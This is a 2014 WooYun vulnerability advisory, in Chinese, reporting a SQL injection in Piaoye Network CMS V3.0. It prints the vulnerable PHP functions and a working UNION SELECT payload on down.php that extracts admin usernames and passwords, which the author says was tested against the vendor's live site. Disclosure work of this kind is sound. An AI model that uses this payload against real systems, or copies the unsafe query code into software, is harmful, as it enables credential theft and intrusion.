当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-064985

漏洞标题:飘叶网络V3.0正式版 sql注入。 官网测试成功

相关厂商:飘叶网络

漏洞作者: roker

提交时间:2014-06-17 14:09

修复时间:2014-09-15 14:10

公开时间:2014-09-15 14:10

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-06-17: 积极联系厂商并且等待厂商认领中,细节不对外公开
2014-09-15: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

rt

详细说明:

function.php 看到这个函数

function List_show($dbname, $class = '', $newsnum = '', $shows = '*', $hot = '0')
{ // newsclass:新闻类型  newsnum:显示条数
    $ie = array(
        'news',
        'pro',
        'down');
    if ($dbname != 0 && $dbname != 1 && $dbname != 2) {
        return "error";
    }
    $sql = "SELECT $shows FROM `$ie[$dbname]` ";
    if ($class != '') {
        $sql .= "where clss=$class ";
    }
    if ($hot != '0' && $dbname == 1) {
        if ($class == "") {
            $sql .= "where hot=1 ";
        } else {
            $sql .= "and hot=1 ";
        }
    }
    $sql .= "order by id desc";
    if ($newsnum != '') {
        $sql .= " LIMIT $newsnum";
    }
    $cls = $GLOBALS['db']->prepare($sql);
    $cls->execute();
    $newlist = $cls->fetchAll();
    return $newlist;
}


down.php 调用了

$id = htmlentities($_GET["uid"], ENT_QUOTES, 'UTF-8');
......
$down=List_show(2,$id);
$down=List_show(2,$id);//下载内容显示
$re_num=count($down);//每页显示的条数
$page_size = 5;//总条目数
$nums = $re_num;//每次显示的页数
$sub_pages = 6;//得到当前是第几页
$pageCurrent = addslashes($_GET["p"]);


只是 htmlentities。 没有单引号 。所以直接注入。
exp down.php?uid=1 union select 1,username,3,4,5,6,7,8,pass,10 from admin%23

p1.jpg


官网测试成功

p2.jpg

漏洞证明:

p2.jpg

修复方案:

过滤

版权声明:转载请注明来源 roker@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝